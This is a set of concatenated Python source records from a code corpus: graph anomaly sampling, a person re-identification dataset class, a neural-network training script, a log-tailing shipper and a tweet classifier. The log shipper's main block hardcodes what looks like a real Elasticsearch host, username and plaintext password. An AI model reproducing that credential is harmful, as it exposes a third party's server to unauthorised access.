_G[u][v]['anomalous2'] = 0\n else:\n for i in range(len(b) - 1):\n if b[i] != 0:\n count += 1\n if count > 0:\n G[u][v]['anomalous'] = 1\n else:\n G[u][v]['anomalous'] = 0\n\n\ndef get_Info(G):\n degree_total = 0\n for x in G.nodes():\n degree_total = degree_total + G.degree(x)\n threshold = degree_total / len(G)\n\n # print('---------original---------')\n # print('nodes number : %d' % G.number_of_nodes())\n # print('edges number : %d' % G.number_of_edges())\n # print(\"average degree: %s\" % threshold)\n # print(\"average clustering: %s\" % nx.average_clustering(G))\n # print(\"density: %s\" % nx.density(G))\n\n\ndef Data_Test(sample_type, filename, iter, rate):\n\n # Test file type\n path1 = \"../KeepAnomalous/ExperimentData_test3/{}_{}{}_node.csv\".format(sample_type, filename, iter)\n path2 = \"../KeepAnomalous/ExperimentData_test3/{}_{}{}_edge.csv\".format(sample_type, filename, iter)\n isDirect = False\n print('hi')\n\n G = loadData(path1, path2, isDirect)\n # get_Info(G)\n\n degree_total = 0\n for x in G.nodes():\n degree_total = degree_total + G.degree(x)\n threshold = degree_total / len(G)\n\n print('---------original---------')\n print('sampling rate : {:.2%} '.format(rate))\n print('--------------------------')\n print('nodes number : %d' % G.number_of_nodes())\n print('edges number : %d' % G.number_of_edges())\n print(\"average degree: %s\" % threshold)\n print(\"average clustering: %s\" % nx.average_clustering(G))\n print(\"density: %s\" % nx.density(G))\n print('---------------------')\n\n orig_anomalous_node = {}\n orig_anomalous_edge = {}\n\n tmp = find_Bridge(G)\n orig_anomalous_edge['bridge'] = tmp\n\n heigh_neighbour = 0.05\n tmp = Extract_Global_High_Neighbor(G, heigh_neighbour)\n orig_anomalous_node['hub'] = tmp\n\n\n\n tmp = Extract_Star(G, threshold)\n orig_anomalous_node['star'] = tmp\n\n tmp = Articulation_Points(G)\n orig_anomalous_node['arti'] = tmp\n\n tmp = Isolates(G)\n orig_anomalous_node['iso'] = tmp\n\n\n sum_node = 0\n for i in orig_anomalous_node:\n sum_node = sum_node + orig_anomalous_node[i]\n\n sum_edge = 0\n for i in orig_anomalous_edge:\n sum_edge = sum_edge + orig_anomalous_edge[i]\n\n print(\"anomalous node sum : %d\" % sum_node)\n print(\"anomalous edge sum : %d\" % sum_edge)\n print(\"anomalous node rate: %f\" % (sum_node / len(list(G.nodes()))))\n print(\"anomalous edge rate: %f\" % (sum_edge / len(list(G.edges()))))\n\n add_Anomalous_types(G)\n\n\n print('---------sampling---------')\n test_Sampling(G, orig_anomalous_edge, orig_anomalous_node)\n\n Save_Graph(G, sample_type, filename, iter)\n\n\nif __name__ == '__main__':\n sample_type = 'NTIES'\n filename = 'pgp2_0.50'\n iter = 1\n rate = 0.15\n for i in range(iter):\n Data_Test(sample_type, filename, i+1, rate)", "sub_path": "KeepAnomalous/keep_anomalous.py", "file_name": "keep_anomalous.py", "file_ext": "py", "file_size_in_byte": 17479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 99, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 107, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 109, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 124, "usage_type": "call"}, {"api_name": "networkx.bridges", "line_number": 143, "usage_type": "call"}, {"api_name": "networkx.write_gml", "line_number": 172, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 176, "usage_type": "call"}, {"api_name": "networkx.average_clustering", "line_number": 197, "usage_type": "call"}, {"api_name": "networkx.density", "line_number": 198, "usage_type": "call"}, {"api_name": "networkx.write_gml", "line_number": 384, "usage_type": "call"}, {"api_name": "networkx.articulation_points", "line_number": 388, "usage_type": "call"}, {"api_name": "networkx.isolates", "line_number": 412, "usage_type": "call"}, {"api_name": "networkx.average_clustering", "line_number": 534, "usage_type": "call"}, {"api_name": "networkx.density", "line_number": 535, "usage_type": "call"}]} +{"seq_id": "518574928", "text": "import os\nimport random\n\nfrom datasets.Market1501Dataset import Market1501Dataset\n\nPRW_MEAN = [107.78022505, 102.29057153, 100.65454852]\nPRW_STD = [48.71011114, 47.32708588, 46.7601729]\nPRW_NUM_TRAINING_CLASSES = 485\n\n\nclass PRWDataset(Market1501Dataset):\n\tdef __init__(self, data_directory, dataset_part, mean=None, std=None, num_classes=None, augment=True, png=False):\n\t\tif mean is None:\n\t\t\tmean = PRW_MEAN\n\t\tif std is None:\n\t\t\tstd = PRW_STD\n\t\tif num_classes is None:\n\t\t\tnum_classes = PRW_NUM_TRAINING_CLASSES\n\n\t\tsuper().__init__(mean=mean, std=std, num_classes=num_classes, data_directory=data_directory, dataset_part=dataset_part, augment=augment, png=png)\n\n\tdef get_input_data(self, is_training):\n\t\tif self._dataset_part is 'test':\n\t\t\timage_paths = self.get_images_from_folder()\n\n\t\t\tif is_training:\n\t\t\t\trandom.shuffle(image_paths)\n\n\t\t\tfile_names = [os.path.basename(file) for file in image_paths]\n\n\t\t\tactual_labels = [0] * len(image_paths)\n\t\t\tlabels = [0] * len(image_paths)\n\t\t\tcameras = [0] * len(image_paths)\n\n\t\t\tprint('Read %d image paths for processing for dataset_part: %s' % (len(image_paths), self._dataset_part))\n\t\t\treturn image_paths, file_names, actual_labels, labels, cameras\n\n\t\telse:\n\t\t\treturn super().get_input_data(is_training)\n", "sub_path": "datasets/PRWDataset.py", "file_name": "PRWDataset.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "datasets.Market1501Dataset.Market1501Dataset", "line_number": 11, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "27069088", "text": "# -*- coding: utf-8 -*-\n# %%\n# execute with qsub main.py -epochs 16 -batch_size 2 -config config/training_two_spirals.yaml -time_steps 1 2 4 8 16 20 25 28 30 32 -depth 32\n# this loops multiple trainings with different time-steps. See in the config file for further specifications\n# ! python\n\n# name\n#$ -N training\n\n# execute from current directory\n#$ -cwd\n\n# Preserve environment variables\n#$ -V\n\n# Provide path to python executable, has to provide the packages from requirements.txt\n#$ -S /home/stenger/smaxxhome/anaconda3/envs/gpu/bin/python\n\n# Merge error and out\n#$ -j yes\n\n# serial queue\n#$ -q taranis-gpu1.q\n\n# Path for output\n#$ -o /home/stenger/smaxxhome/outputs\n\n# %%\nimport os, sys\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import random_split\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom tqdm import tqdm\nimport yaml\nimport pprint\nimport re\n\nimport wandb\n\nworking_path = os.path.join(os.path.dirname(os.getcwd()), '')\nsys.path.append(working_path)\n\nfrom src.modules import STLSTM, Conv2D\nfrom src.datasets import BarkleyDataset\n\nimport argparse\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint('Found', torch.cuda.device_count(), 'GPUs')\n\nwandb.login()\n\nos.environ[\"WANDB_MODE\"] = \"dryrun\"\n\ntorch.manual_seed(42)\n\n\n# %%\ndef make(config): \n #model = nn.DataParallel(STLSTM(1,config['hidden_size'])).to(device)\n model = nn.DataParallel(Conv2D()).to(device)\n \n print(config['depths'])\n \n if config['dataset']=='regimeA':\n root = config['data_folder_regimeA']\n elif config['dataset']=='regimeB':\n root = config['data_folder_regimeB']\n \n #train_dataset = BarkleyDataset(root=root,\n # train=True, \n # depths=config['depths'],\n # time_steps=config['time_steps'])\n \n #n_train = int(len(train_dataset)*0.90+0.5)\n #n_val = int(len(train_dataset)*0.10+0.5)\n \n #torch.manual_seed(42)\n #train_dataset, test_dataset = random_split(train_dataset, [n_train, n_val]) \n #test_dataset.train = False\n\n #train_loader = DataLoader(train_dataset, config['batch_size'], shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n #test_loader = DataLoader(test_dataset, 2, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n \n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=config['lr'])\n\n \n return model, criterion, optimizer\n\n# %%\ndef getDataLoader(dataset_idx, config):\n print(f'Load dataset number {dataset_idx}')\n if config['dataset']=='regimeA':\n root = config['data_folder_regimeA']\n elif config['dataset']=='regimeB':\n root = config['data_folder_regimeB']\n \n #print('Hier', config['depths'], type(config['depths']), type(config['depths'][0]))\n train_dataset = BarkleyDataset(root=root,\n train=True, \n depths=config['depths'],\n time_steps=config['time_steps'])\n \n n_train = int(len(train_dataset)*0.90+0.5)\n n_val = int(len(train_dataset)*0.10+0.5)\n \n torch.manual_seed(42)\n train_dataset, val_dataset = random_split(train_dataset, [n_train, n_val]) \n val_dataset.train = False\n\n train_loader = DataLoader(train_dataset, config['batch_size'], shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n val_loader = DataLoader(val_dataset, 2, shuffle=True, num_workers=0, pin_memory=True, drop_last=True)\n \n return train_loader, val_loader\n\n\n# %%\ndef train(model, criterion, optimizer, config, val_fn=nn.MSELoss()):\n #torch.save(model.state_dict(), 'model')\n def get_lr():\n for param_group in optimizer.param_groups:\n return param_group['lr']\n \n lrp = ReduceLROnPlateau(optimizer, patience=512, factor=0.3, min_lr=1e-7, verbose=True)\n \n #test_dataloader_iter = iter(test_dataloader)\n \n if config['dataset']=='regimeA':\n config['save_dir'] = config['save_folder_models_regimeA']\n elif config['dataset']=='regimeB':\n config['save_dir'] = config['save_folder_models_regimeB']\n \n \n min_val_loss = 10000 \n val_losses = []\n \n depths = config['depths']\n \n print(config['save_name'] )\n\n for epoch in range(config['epochs']): \n print(f'Epoch number {epoch}')\n for dataset_idx in range(config['num_datasets']):\n train_loader, test_loader = getDataLoader(dataset_idx=dataset_idx, config=config)\n test_loader_iter = iter(test_loader)\n \n for i, (X,y) in tqdm(enumerate(train_loader), total=len(train_loader)):\n model.zero_grad()\n optimizer.zero_grad()\n\n X = X.to(device)\n y = y.to(device)\n\n outputs = model(X, max_depth=len(depths))\n\n loss = 0.0\n loss += criterion(y, outputs) # [depths,batch,features=1,:,:]\n\n outputs = outputs.detach()\n\n loss.backward()\n optimizer.step() \n\n if i%10==0:\n try:\n X_val, y_val = next(test_loader_iter)\n except StopIteration:\n test_loader_iter = iter(test_loader)\n X_val, y_val = next(test_loader_iter)\n X_val = X_val.to(device)\n y_val = y_val.to(device)\n\n with torch.no_grad():\n val_outputs = model(X_val, max_depth=len(depths))\n val_loss = val_fn(y_val, val_outputs)\n val_losses.append(val_loss.cpu().detach().numpy())\n lrp.step(val_loss)\n\n wandb.log({\"loss\": loss, \"val_loss\":val_loss})\n if val_loss < min_val_loss:\n min_val_loss = val_loss\n\n name = config['save_name'] + '_t' + str(config['time_steps_savename']) + '_d' + config['depths_savename']\n\n try:\n os.makedirs(config['save_dir'])\n except FileExistsError:\n pass\n\n savename = os.path.join(config['save_dir'], name)\n print('Save model under:', savename)\n torch.save(model.state_dict(), savename) \n\n# %%\ndef pipeline(config): \n if config['dataset']=='regimeA':\n data_folder = config['data_folder_regimeA']\n log_folder = config['log_folder_regimeA']\n save_folder_models = config['save_folder_models_regimeA']\n elif config['dataset']=='regimeB':\n data_folder = config['data_folder_regimeB']\n log_folder = config['log_folder_regimeB']\n save_folder_models = config['save_folder_models_regimeB']\n \n #if config['wandb']:\n \n name = config['save_name'] + '_t' + str(config['time_steps_savename']) + '_d' + config['depths_savename']\n \n wandb.init(project=config['project_name'], \n name=name, dir=log_folder, \n config=config, \n reinit=True)\n \n #config = wandb.config\n \n model, criterion, optimizer = make(config)\n #if config['wandb']:\n wandb.watch(model, criterion, log=\"all\", log_freq=32)\n \n train(model, criterion, optimizer, config, val_fn=nn.L1Loss())\n\n #run.finish()\n return model\n\n# %%\nif __name__=='__main__':\n parser = argparse.ArgumentParser(description='Training of Neural Networks, the Barkley Diver')\n\n ### Names ###\n parser.add_argument('-project_name', '--project_name', type=str)\n parser.add_argument('-name', '--name', type=str, help='')\n \n ### Save and load dataset/weights etc. ###\n parser.add_argument('-dataset', '--dataset', type=str)\n parser.add_argument('-save_name', '--save_name', type=str)\n \n ### Model ###\n parser.add_argument('-architecture', '--architecture', type=str)\n parser.add_argument('-hidden_size', '--hidden_size', type=int)\n \n ### Training process ###\n parser.add_argument('-lr', '--lr', type=int)\n parser.add_argument('-batch_size', '--batch_size', type=int)\n \n ### Experiment specific quantities ###\n parser.add_argument('-epochs', '--epochs', type=int)\n parser.add_argument('-time_steps', '--time_steps', type=list, nargs='+', \n help='Time steps given as input, for example like: 0-31,2; or as a list: 0 1 2 3,')\n parser.add_argument('-depths', '--depths', type=list, nargs='+', \n help='Depths given as target for prediction, for example like: 0-31,2; or as a list: 0 1 2 3,')\n \n # Config files\n parser.add_argument('-config', '--config', type=str, help='Place of config file')\n parser.add_argument('-metadata', '--metadata', type=str, help='Main folder structure')\n parser.add_argument('-offline', '--offline', type=str, help='Use wandb-logger online?')\n parser.add_argument('-num_datasets', '--num_datasets', type=int, help='How many dataset-files should be used?...increases the training-size')\n\n _args = parser.parse_args()\n args = vars(_args)\n args_parser = {k: v for k, v in args.items() if v is not None}\n #args_parser = vars(parser.parse_args())\n #print(args_parser)\n\n metadata = args['metadata']\n \n if not isinstance(args['config'], type(None)):\n try:\n with open(args['config']) as config_file:\n config_args = yaml.load(config_file, Loader=yaml.FullLoader)\n args.update(config_args)\n except FileNotFoundError:\n print('Config-file not found, use default values')\n assert('Config-file not found, use default values') \n \n if metadata is not None:\n args['metadata'] = metadata\n \n if not isinstance(args['metadata'], type(None)):\n #print(args['metadata'])\n try:\n with open(args['metadata']) as config_file:\n metadata_args = yaml.load(config_file, Loader=yaml.FullLoader)\n args.update(metadata_args)\n except FileNotFoundError:\n print('Metadata-file not found, use default values')\n assert('Metadata-file not found, use default values') \n\n \n #pipeline(args)\n #print(args, '\\n', args_parser)\n \n args.update(args_parser)\n \n if len(args['depths'])>1:\n depths = [int(''.join(depth)) for depth in args['depths']]\n\n elif len(args['depths'])==1:\n s = args['depths'][0]\n s = ''.join(s)\n ints = [int(r) for r in re.split(',|-', s)]\n #print('Länge ints', ints)\n if len(ints)==1:\n depths = ints\n #print(ints)\n else:\n depths = np.arange(*ints)\n \n args['depths_savename'] = s\n args['depths'] = depths\n \n \n \n if len(args['time_steps'])>1:\n time_steps = [int(''.join(time_step)) for time_step in args['time_steps']]\n\n elif len(args['time_steps'])==1:\n s = args['time_steps'][0]\n \n s = ''.join(s)\n ints = [int(r) for r in re.split(',|-', s)]\n if len(ints)==1:\n time_steps = ints\n #print(ints)\n else:\n time_steps = np.arange(*ints)\n \n args['time_steps_savename'] = s\n args['time_steps'] = time_steps\n \n pprint.pprint(args)\n\n m = pipeline(args)\n \n \n \"\"\"\n args_config.update(specified_config)\n\n if int(args.offline)==True:\n print('No internet')\n os.environ['WANDB_MODE'] = 'dryrun'\n WANDB_MODE=\"dryrun\"\n\n if not isinstance(args.depths, type(None)):\n print(args.depths)\n depths = args.depths\n print(depths)\n ds = [int(''.join(depth)) for depth in depths]\n\n args_config['depths'] = ds\n if not isinstance(args.time_steps, type(None)):\n for t in args.time_steps:\n t_int = int(''.join(t))\n args_config['time_step'] = t_int\n\n for key, value in args_config.items():\n print(key + ':', value)\n\n m = pipeline(args_config)\n else:\n for key, value in args_config.items():\n print(key + ':', value)\n\n m = pipeline(args_config)\n \n elif not isinstance(args.time_steps, type(None)):\n for t in args.time_steps:\n t_int = int(''.join(t))\n args_config['time_step'] = t_int\n for key, value in args_config.items():\n print(key + ':', value)\n m = pipeline(args_config)\n else:\n for key, value in args_config.items():\n print(key + ':', value)\n m = pipeline(args_config)\n \n \"\"\"\n", "sub_path": "scripts/training.py", "file_name": "training.py", "file_ext": "py", "file_size_in_byte": 12865, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 48, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.cuda.device_count", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 57, "usage_type": "attribute"}, {"api_name": "wandb.login", "line_number": 59, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "src.modules.Conv2D", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src.datasets.BarkleyDataset", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 182, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 188, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 201, "usage_type": "call"}, {"api_name": "wandb.init", "line_number": 218, "usage_type": "call"}, {"api_name": "wandb.watch", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 229, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 236, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 278, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 278, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 291, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 291, "usage_type": "attribute"}, {"api_name": "re.split", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 315, "usage_type": "call"}, {"api_name": "re.split", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 334, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 339, "usage_type": "call"}]} +{"seq_id": "331470287", "text": "import subprocess\nimport datetime\nimport re\nfrom functools import partial\nimport _thread\nimport time\nimport sys\nfrom .line_parser.django import join_line\nfrom .line_parser.django import django_log_parsers,django_process_parsers\nfrom .line_parser.nginx import nginx_log_parser,nginx_log_full_parser\nimport inspect\n\nimport os\nimport logging\n\ngeneral_log = logging.getLogger('general_log')\n\nclass DFileBeat(object):\n def __init__(self, harvest, parsers,outputs,beat_span=5):\n self.harvest=harvest\n self.parsers = parsers\n self.outputs = outputs\n self.beat_span = beat_span\n \n def run(self):\n self.cache_list = []\n self.harvest(self)\n self.beat()\n\n \n def beat(self):\n while True:\n #print('心跳')\n out_list = self.cache_list\n self.cache_list =[]\n if not out_list:\n time.sleep(self.beat_span)\n continue\n try:\n for parser in self.parsers:\n out_list = parser(out_list)\n for output in self.outputs:\n if hasattr(output,'send'):\n output.send(out_list)\n else:\n output(self,out_list)\n \n #except UserWarning as e:\n #print(e)\n #print('debug syntax')\n except Exception as e:\n general_log.debug(out_list)\n general_log.error('[ERROR]=======> parse or send log get Exception')\n general_log.error(e,exc_info=True) \n \n time.sleep(self.beat_span)\n\n\ndef multi_tail_file(path_list,self):\n for path in path_list:\n if not os.path.exists(path):\n pathdir = os.path.dirname(path)\n try:\n os.makedirs(pathdir)\n except:\n pass\n with open(path,'w') as f:\n pass\n \n #not_exist = True\n #while not_exist:\n #not_exist= False\n #for path in path_list:\n #if not os.path.exists(path):\n #general_log.info('%s not exist;check again after 2 seconds'%path)\n #not_exist = True\n #time.sleep(2)\n #break\n \n self.running_thread =[]\n for path in path_list:\n self.running_thread.append(\n _thread.start_new_thread(tail_file,(path, self))\n )\n\ndef tail_file(path,self):\n general_log.debug('watching path:%s'%path)\n if sys.platform=='win32':\n p = subprocess.Popen('tail -f %s'%path,stdout= subprocess.PIPE,shell=True)\n else:\n p = subprocess.Popen('tail -F %s'%path,stdout= subprocess.PIPE,shell=True)\n start_now = datetime.datetime.now()\n record = False\n while p.poll() is None:\n line = p.stdout.readline()\n line_temp = line.strip()\n if not record:\n now = datetime.datetime.now()\n if now- start_now > datetime.timedelta(seconds =2):\n record = True\n general_log.debug('start recording')\n if line_temp and record:\n self.cache_list.append( {'path':path,'message':line} )\n\n\nif __name__ =='__main__':\n from . output.elastic import elastice_output\n pp = DFileBeat(harvest= partial(multi_tail_file,\n [\n r'D:\\coblan\\py3\\fastdog\\maintain\\filebeat\\test_ok.log',\n r'D:\\coblan\\py3\\fastdog\\maintain\\filebeat\\test_ok2.log'\n ]),\n parsers =[\n decode_utf8,\n join_line,\n partial(strip_word,'level'),\n partial(strip_span,'@timestamp',23), datetime_timestamp,\n \n ],\n outputs = [\n partial(elastice_output,'z.enjoyst.com:9200','elastic','he27375089','beat-test')\n ] )\n pp.run()\n \n", "sub_path": "maintain/filebeat/dfilebeat.py", "file_name": "dfilebeat.py", "file_ext": "py", "file_size_in_byte": 4072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 64, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 88, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 89, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 91, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 99, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 108, "usage_type": "call"}, {"api_name": "line_parser.django.join_line", "line_number": 115, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 116, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 117, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 121, "usage_type": "call"}, {"api_name": "output.elastic.elastice_output", "line_number": 121, "usage_type": "argument"}]} +{"seq_id": "531754766", "text": "# pylint: disable=too-many-locals\nimport os\nimport argparse\n\nimport argcomplete\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\n\nfrom ml import modelsaving, features\nfrom preprocessing import cleantext\n\nTWEET_COLUMN = 'tweet'\nLABEL_COLUMN = 'label'\n\nRANDOM_STATE = 42\n\n\ndef _get_model_by_name(model_type: str):\n if model_type == \"LogisticRegression\":\n model = LogisticRegression(random_state=RANDOM_STATE)\n elif model_type == \"SVC\":\n model = SVC(random_state=RANDOM_STATE)\n elif model_type == \"RandomForestClassifier\":\n model = RandomForestClassifier(random_state=RANDOM_STATE)\n elif model_type == \"GradientBoostingClassifier\":\n model = GradientBoostingClassifier(random_state=RANDOM_STATE)\n elif model_type == \"ExtraTreesClassifier\":\n model = ExtraTreesClassifier(random_state=RANDOM_STATE)\n elif model_type == 'MultinomialNB':\n model = MultinomialNB()\n else:\n raise ValueError(\"Unknown model type\")\n print(\"Model type is: {}\".format(model_type))\n return model\n\n\ndef train(input_train_csv: str,\n input_test_csv: str,\n model_type: str,\n output_dir: str,\n k_related_terms: str) -> None:\n print(\"Reading files\")\n train_df = pd.read_csv(input_train_csv)\n test_df = pd.read_csv(input_test_csv)\n\n print(\"Encoding labels\")\n y_train = train_df[LABEL_COLUMN].to_list()\n labels = list(set(y_train))\n y_test = test_df[LABEL_COLUMN].to_list()\n label_encoder = LabelEncoder()\n label_encoder.fit(labels)\n vec_y_cat_train = label_encoder.transform(y_train)\n vec_y_cat_test = label_encoder.transform(y_test)\n\n x_train = train_df[TWEET_COLUMN].apply(cleantext.clean_tweet).to_list()\n\n # get model by its name\n single_model = _get_model_by_name(model_type)\n\n print(\"Vectorizing training data\")\n vectorizer = TfidfVectorizer(ngram_range=(1, 2))\n x_train_tfidf = vectorizer.fit_transform(x_train)\n\n # hyper parameters for each model\n parameters = {\n 'LogisticRegression': {'penalty': ['l2'],\n 'solver': ['liblinear', 'lbfgs'],\n 'C': [1.0, 10]},\n 'ExtraTreesClassifier': {'n_estimators': [16, 32]},\n 'RandomForestClassifier': {'n_estimators': [16, 32]},\n 'GradientBoostingClassifier': {'n_estimators': [16, 32], 'learning_rate': [0.8, 1.0]},\n 'SVC': [\n {'kernel': ['rbf'], 'gamma': [1e-3, 1e-4], 'C': [1, 10, 100]},\n {'kernel': ['linear'], 'C': [1, 10, 100]}\n ]\n }\n\n # grid search cross-validation\n clf = GridSearchCV(single_model,\n parameters[model_type],\n cv=5,\n verbose=3,\n n_jobs=-1,\n scoring='accuracy',\n refit=True)\n\n print(\"Training\")\n clf.fit(x_train_tfidf, vec_y_cat_train)\n\n print(\"Best parameters on the validation test:\")\n print(clf.best_params_)\n\n print(\"Grid scores on validation set:\")\n means = clf.cv_results_['mean_test_score']\n stds = clf.cv_results_['std_test_score']\n for mean, std, params in zip(means, stds, clf.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\" % (mean, std * 2, params))\n print()\n\n print(\"Saving model\")\n model_dir = os.path.join(output_dir, model_type)\n modelsaving.save_model(clf.best_estimator_, model_dir)\n modelsaving.save_vectorizer(vectorizer, model_dir)\n modelsaving.save_label_encoder(label_encoder, model_dir)\n\n print(\"Predicting training set\")\n predicted = clf.predict(x_train_tfidf)\n accuracy = np.mean(predicted == vec_y_cat_train)\n print(\"Accuracy on train set: {}\".format(accuracy))\n\n print(\"Vectorizing test data\")\n x_test = test_df[TWEET_COLUMN].apply(cleantext.clean_tweet).to_list()\n x_test_tfidf = vectorizer.transform(x_test)\n\n print(\"Predicting test set\")\n predicted = clf.predict(x_test_tfidf)\n accuracy = np.mean(predicted == vec_y_cat_test)\n\n print(\"Accuracy on test set: {}\".format(accuracy))\n target_names = [str(class_name) for class_name in label_encoder.classes_]\n print(classification_report(vec_y_cat_test,\n predicted,\n target_names=target_names))\n\n print(\"Plotting top K features for each class\")\n features.plot_top_k_features(vectorizer, clf.best_estimator_, model_dir, k_related_terms)\n\n\ndef main():\n argument_parser = argparse.ArgumentParser()\n argument_parser.add_argument(\"--input-train\", type=str,\n help='Input CSV file containing training tweets', required=True)\n argument_parser.add_argument(\"--input-test\", type=str,\n help='Input CSV file containing test tweets', required=True)\n argument_parser.add_argument(\"--model\", type=str,\n help='Model type to train', default='SVM', required=False)\n argument_parser.add_argument(\"--output-dir\", type=str, help='Directory for output', required=True)\n argument_parser.add_argument(\"--k-related-terms\", type=int,\n help='Number of related terms to output per company. Default: 10', required=False,\n default=10)\n argcomplete.autocomplete(argument_parser)\n args = argument_parser.parse_args()\n train(args.input_train, args.input_test, args.model, args.output_dir, args.k_related_terms)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/ml/trainingclassifier.py", "file_name": "trainingclassifier.py", "file_ext": "py", "file_size_in_byte": 5933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 30, "usage_type": "call"}, {"api_name": 